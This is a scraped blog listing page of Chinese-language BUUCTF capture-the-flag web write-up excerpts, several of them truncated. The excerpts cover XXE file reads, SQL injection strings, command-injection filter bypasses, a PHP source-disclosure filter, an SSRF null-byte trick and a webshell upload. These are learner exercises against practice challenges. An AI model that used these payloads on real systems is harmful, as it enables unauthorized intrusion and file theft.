buuctf
文章平均质量分 60
__byb__
进击的小白,一起学习,共同进步!
展开
-
buuctf Phuck2
<?php stream_wrapper_unregister('php'); if(isset($_GET['hl'])) highlight_file(__FILE__); $mkdir = function($dir) { system('mkdir -- '.escapeshellarg($dir)); }; $randFolder = bin2hex(random_bytes(16)); $mkdir('users/'.$r.原创 2021-11-02 22:17:47 · 679 阅读 · 1 评论 -
BUUCTF [CSAWQual 2019]Web_Unagi 1
BUUCTF [CSAWQual 2019]Web_Unagi 1提示在/flag有提示了上传xml文件及其格式直接用之前xml注入的上传即可。改文件名为1.xml上传即可得flag<?xml version='1.0'?><!DOCTYPE users [<!ENTITY xxe SYSTEM "file:///flag" >]><users> <user> <username>&xx原创 2021-09-09 15:31:44 · 580 阅读 · 0 评论 -
buuCTF [ISITDTU 2019]EasyPHP 1
buuCTF [ISITDTU 2019]EasyPHP 1直接代码审计。第一个if,过preg_match。一般有三种方法:取反绕过,异或绕过,转义绕过。这里用取反绕过。第二个if的意思是输入的字符串不重复的字符长度不超过0xd即13。如aaa((bc不重复字符为a(bc长度为4。尝试phpinfo:?_=(%ff%ff%ff%ff%ff%ff%ff^%8f%97%8f%96%91%99%90)();可以去看看disable_function禁了哪些函数。附上异或php脚本:<原创 2021-08-08 01:00:35 · 828 阅读 · 0 评论 -
buuCTF [安洵杯 2019]不是文件上传 1
buuCTF [安洵杯 2019]不是文件上传 1这题给了源码,buuctf上直接给了。GitHub上搜索wowouploadimage也搜得到三个文件upload.php<!DOCTYPE html><html><head> <title>Image Upload</title> <link rel="stylesheet" href="./style.css"> <meta http-equiv="cont原创 2021-08-06 21:15:21 · 582 阅读 · 0 评论 -
BUUCTF [SWPUCTF 2018]SimplePHP 1
[SWPUCTF 2018]SimplePHP 1这里主要记录下pop链生成的过程,其他解题过程看其他博客。源class.php文件:<?php#classclass C1e4r{ public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() {原创 2021-07-28 15:18:38 · 628 阅读 · 0 评论 -
BUUCTF [CISCN2019 华北赛区 Day1 Web1]Dropbox 1
进入页面随便注册一个账号,登录。随便上传一个图片。用burpsuite拦截下载页面,里面有任意文件下载文件,可以下载源码。用../../index.php格式把index.php,download.php, delete.php下载,打开发现用到class.php,也下了。#index.php<?phpsession_start();if (!isset($_SESSION['login'])) { header("Location: login.php"); die原创 2021-07-08 00:46:52 · 1266 阅读 · 2 评论 -
BUUCTF [MRCTF2020]Ezpop 1
BUUCTF [MRCTF2020]Ezpop 1Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { pr原创 2021-04-21 00:37:32 · 1347 阅读 · 4 评论 -
buuCTF [BJDCTF2020]EasySearch 1
buuCTF [BJDCTF2020]EasySearch 1进去后是这样扫后台发现index.php.swp备份。这里吐槽一下。我用dirsearch扫了3次都没出来,最后用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。要求password的md5值的前6个字符为6d0bc1。敲代码(python):from hashlib import md5for i in range(10000000): if md5(str(i).原创 2021-04-14 08:27:42 · 1739 阅读 · 1 评论 -
buuctf [SWPU2019]Web1 1
buuctf [SWPU2019]Web1 1 sql 无列名注入注册登录发布广告1'测试存在sql注入经测试,or,空格,#被过滤不能用order by测试列数,用group by代替注释符#用,'3代替,数字随便(这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语句末尾,那不是失败了?有无懂哥?)空格用/**/代替1'/**/group/**/by/**/22,'31'/**/group/**/by/**/23,'原创 2021-03-13 16:07:54 · 1678 阅读 · 6 评论 -
buuctf日记 [CISCN 2019 初赛]Love Math 1
buuctf日记 [CISCN 2019 初赛]Love Math 1payloadc=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat /flagbase_convert(37907361743,10,36) #把十进制数“37907361743”转为36进制(0-9,a-z)base_convert(37907361743,10,3原创 2021-03-06 15:31:27 · 360 阅读 · 0 评论 -
buuctf刷题日记 [网鼎杯 2020 朱雀组]phpweb 1
buuctf刷题日记 [网鼎杯 2020 朱雀组]phpweb 1看源码,扫后台没有什么信息。抓包后看见func=date&p=Y-m-d+h%3Ai%3As+a很像date()函数的运用方法,p的参数类似data()的参数。返回时间日期等,调用func的函数date(),以p的内容作为函数参数,就是call_user_func()函数的用法。构造payload获取index.php源码func=file_get_contents&p=index.php<?php原创 2021-03-04 14:16:17 · 297 阅读 · 1 评论 -
BUUCTF [De1CTF 2019]SSRF Me 1
BUUCTF [De1CTF 2019]SSRF Me 1把代码整理,添上一些注释#! /usr/bin/env python# encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')原创 2021-03-04 00:17:21 · 552 阅读 · 1 评论 -
BUUCTF [GKCTF2020]cve版签到 1
提示参数只能以.ctfhub.com 结尾。以题目的角度意思为对结尾进行字符串匹配过滤。提示的cve-2020-7066漏洞是get_headers()函数会被%00截断,会造成ssrf输入/?url=http://127.0.0.1%00.ctfhub.com访问目标访问内部资源敏感信息–>“flag”输入/?url=http://127.0.0.123%00.ctfhub.com...原创 2021-01-20 21:53:57 · 343 阅读 · 0 评论 -
BUUCTF [网鼎杯 2018]Fakebook 1
BUUCTF [网鼎杯 2018]Fakebook 1join(注册)一个账号,按用户名进入主页发现注入点nono=1 order by 4#没事no=1 order by 5#报错,有4列no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。爆表名no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc原创 2021-01-19 13:04:42 · 4973 阅读 · 15 评论 -
2021-01-18
来到sql注入骚姿势,我们一点一点开始学我们来到这道题,然后尝试注入,结果发现拼接’or ‘1’='1'or ‘1’='2如果是字符型注入则会报错,然而并没有而是显示的页面一样,通过常规注入,回显的页面都是最后,我们发现这道题是xpath报错注入,函数注入extractvalue()extractvalue() :对XML文档进行查询的函数语法:extractvalue(目标xml文档,xml路径)第一个参数 : 第一个参数可以传入目标xml文档第二个参数: xml中的位置是可操作转载 2021-01-18 18:41:45 · 388 阅读 · 0 评论 -
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack Worldbuu 限制访问频率所以要时间间隔久点改这个函数time.sleep(0.1)import requestsimport timeimport reurl='http://2c82f86e-108a-4aa5-b1d2-49fc08b0f2f9.node3.buuoj.cn/index.php'flag = ''for i in range(1,50): max = 127 min = 0原创 2021-01-18 18:18:06 · 366 阅读 · 0 评论 -
BUUCTF [SUCTF 2019]CheckIn 1
BUUCTF [SUCTF 2019]CheckIn 1文件包含,一句话木马上传。直接上传一句话木马<?php eval($_POST['a']);?>非法后缀那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp都试试,都不行。这时候可以用图片上传。在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入GIF89a<script language=php>eval($_POST['a']);&l原创 2021-01-17 16:20:47 · 743 阅读 · 3 评论 -
BUUCTF [HCTF 2018]admin 1
BUUCTF [HCTF 2018]admin 1进去后是这样,右上角有注册登录。看看主页源码。看来如果是admin(管理员)会有东西不同。随便注册一个账号,登录(注册登录的源码都看看,所有的页面源码都要看!找提示,甚至一行一行代码看)。在改密码界面看到:输网址,下载。用pycharm或其他打开,审计代码。先看路由(route)没什么特别的,就其他都看看。最后在templates目录下的index.html找到如果session等于admin就出hctf{},即flag。而提示原创 2021-01-15 19:29:31 · 5159 阅读 · 9 评论 -
BUUCTF [极客大挑战 2019]BabySQL 1sql注入
BUUCTF [极客大挑战 2019]BabySQL 1进去后是这样:还是熟悉的配方,还是熟悉的味道。题目就是sql注入,就不检测是否有注入点了。输入1' or 1=1;#emmm…暂时看不懂什么意思现在就可以胡乱的输入一些注入语句了。发现报错都是部分输入的语句,这说明没报错的语句没了,或者替换掉了,对,没错,可能是用replace函数换成空了。现在证实这个猜想。在username输入1'%23就是1'#的意思:用户名密码错误!说明我们的sql语句1'#是可执行的,也就是说之前的报错就原创 2021-01-14 22:39:32 · 807 阅读 · 0 评论 -
BUUCTF [极客大挑战 2019]PHP 1
BUUCTF [极客大挑战 2019]PHP 1-刷题日记进去后是这样:提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt-u+地址 -e选择语言 -w选择字典要多试几次,有时扫不出来,真的坑。(御剑更坑!)输原创 2021-01-14 14:16:22 · 5609 阅读 · 8 评论 -
BUUCTF RoarCTF 2019]Easy Calc 1
BUUCTF RoarCTF 2019]Easy Calc 1-刷题个人日记小白一个,写给自己看。进去后是这样:随便输入几个运算,就是一个普通的计算器。尝试sql注入,输入1'和1'#:好8,计算器怎么会连接数据库呢,想太多了。(不过实战也是能想到的方法都试试)ctrl+u看网页代码,发现了一个网页:calc.php进去看看:所以之前的网页只是障眼法。这才是我们要目标。构造payload/calc.php? num=2;var_dump(scandir(chr(47)))找到f1原创 2021-01-12 20:56:13 · 2856 阅读 · 1 评论 -
buuctf [GXYCTF2019]Ping Ping Ping 1
buuctf [GXYCTF2019]Ping Ping Ping 1-刷题个人日记小白一个,写给自己看。进去后是这样:ctrl+u看网页源码也没什么,随便输个数据看看:源码一样没什么。看题目提示,试试你能想到的方法,比如sql注入:输入ip=1'不是sql注入,试完了发现是命令执行,输入/?ip=1;ls两个都看看,先看index.php输入:/?ip=1;cat index.php看来过滤了空格再输入/?ip=1;cat$IFS$1index.phpIFS在系统命令原创 2021-01-11 18:17:38 · 1842 阅读 · 1 评论 -
buu [极客大挑战 2019]LoveSQL 1
buu [极客大挑战 2019]LoveSQL 1 -刷题个人日记小白一个,写给自己看。进去后是这样:用户名输入1和1'测试发现1'报错有sql语法错误,说明有sql注入点且后台数据库是MariaDB用户名输入sql注入基本公式:1' or 1=1;#结果:3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。慢慢来,payload:check.php?username=admin'原创 2021-01-10 21:16:38 · 1921 阅读 · 0 评论 -
[ACTF2020 新生赛]Include 1
[ACTF2020 新生赛]Include1 -刷题个人日记小白一个,写给自己看。打开后是这样:点击tips后:ctrl+u查看网页代码+抓包:没有发现什么有用的信息。查看题目和网址的file参数,提示这是文件包含的题构造payload:file=php://filter/read=convert.base64-encode/resource=flag.php读出源码,进行base64解码得出flag:flag{ef7e62e5-5ed4-4f53-8c7c-fb80aaabf7cc}原创 2021-01-10 14:25:55 · 9660 阅读 · 5 评论 -
buuctf [强网杯 2019]随便注 1
buuctf web [强网杯 2019]随便注 1 -刷题个人日记小白一个,写给自己看。打开后是这样。从题目和内容来看就是一道sql注入题。输入1' or 1=1;#这个#用来注释掉后面的sql语句显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。输入1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。输入1'; show tables;#可以看到有 191981093原创 2021-01-07 22:12:35 · 11961 阅读 · 15 评论 -
BUUCTF web WarmUp writeup
BUUCTF web WarmUp-刷题个人日记小白一个,写给自己看。[打开后是这样]按F12后发现一个文件,输入后: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.原创 2020-12-19 10:36:27 · 380 阅读 · 2 评论